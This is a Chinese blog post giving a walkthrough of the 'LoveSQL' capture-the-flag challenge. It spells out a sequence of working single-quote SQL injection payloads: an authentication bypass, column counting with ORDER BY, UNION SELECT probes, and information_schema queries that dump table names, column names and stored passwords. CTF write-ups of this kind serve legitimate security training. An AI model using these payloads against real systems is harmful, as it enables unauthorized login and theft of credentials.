当前位置: 首页 > news >正文

sql注入 [极客大挑战 2019]LoveSQL 1

news 2025/8/17 4:13:28

打开题目

几次尝试,发现输1 1",页面都会回显NO,Wrong username password!!!

只有输入1',页面报错,说明是单引号的字符型注入

 那我们万能密码试试能不能登录

1' or 1=1 #

成功登录

得到账号和密码

我们登录一下发现什么也没有

爆破列名字段数

1' order by 4 #  页面报错

但是1' order by 3 #时

页面没有报错,说明列名字段数为3

爆破数据显示位

1' union select 1,2,3 #

可以得到数据显示位为2和3

接着我们爆破数据库名

1' union select 1,2,database() #

得到数据库名为geek

爆破表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

当前数据库下的所有表名有

爆破列名

在这里我们先试试l0ve1ysq1表

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

得到其表下有三个字段

我们直接爆破password字段试试下面有没有flag

1' union select 1,2,group_concat(password) from l0ve1ysq1 #

得到数据

直接查看源代码得到flag

http://www.lryc.cn/news/239502.html

相关文章:

  • 验证码 | 可视化一键管控各场景下的风险数据
  • 问题解决:Ubuntu18.04下nvcc -V指令可用,/usr/local/下却没有cuda文件夹,原因分析及卸载方法
  • uniapp+vue3使用pinia,安卓端报错白屏
  • OpenCV图像处理、计算机视觉实战应用
  • MySQL 事务的底层原理和 MVCC(一)
  • vue3中使用全局自定义指令和组件自定义指令
  • JVM 堆外内存详解
  • 数据库的基本概念以及MySQL基本操作
  • 【Docker】Docker安装Nginx配置静态资源
  • 【码神之路】【Golang】博客网站的搭建【学习笔记整理 持续更新...】
  • Win10 电源选项那选择“关闭显示器“为1分钟,1分钟后就锁屏了?怎么才能关闭显示器后不锁屏
  • 虚拟机centos设置网络模式(桥接|NAT)
  • MySQL 8.2 Command Line Client打开时一闪而过闪退问题
  • 【NI-RIO入门】CompactRIO介绍及环境安装
  • 生产问题 Recv-Q101
  • 从零开始:Rust环境搭建指南
  • Tensorrt 实现 yolov5-cls 遇到的问题
  • 智能指针(Newbie Note)
  • 2023.11.22 homework
  • 存储日志数据并满足安全要求
  • Linux系统管理与服务器安全:构建稳健云数据中心
  • 用css实现原生form中radio单选框和input输入框的hover样式以及聚焦focus的样式
  • 【中国平安社招校招】【内推】【当天内推】
  • CentOS 8最小安装,VM使用这个内存占用小很多
  • 【C++ Primer Plus学习记录】递增运算符(++)和递减运算符(--)
  • Oracle 数据库中 查询时如何使用日期(时间)作为查询条件
  • Tomcat 基线安全加固操作
  • redis缓存穿透、击穿、雪崩
  • 什么是数字孪生?
  • 【DevOps】Git 图文详解(八):后悔药 - 撤销变更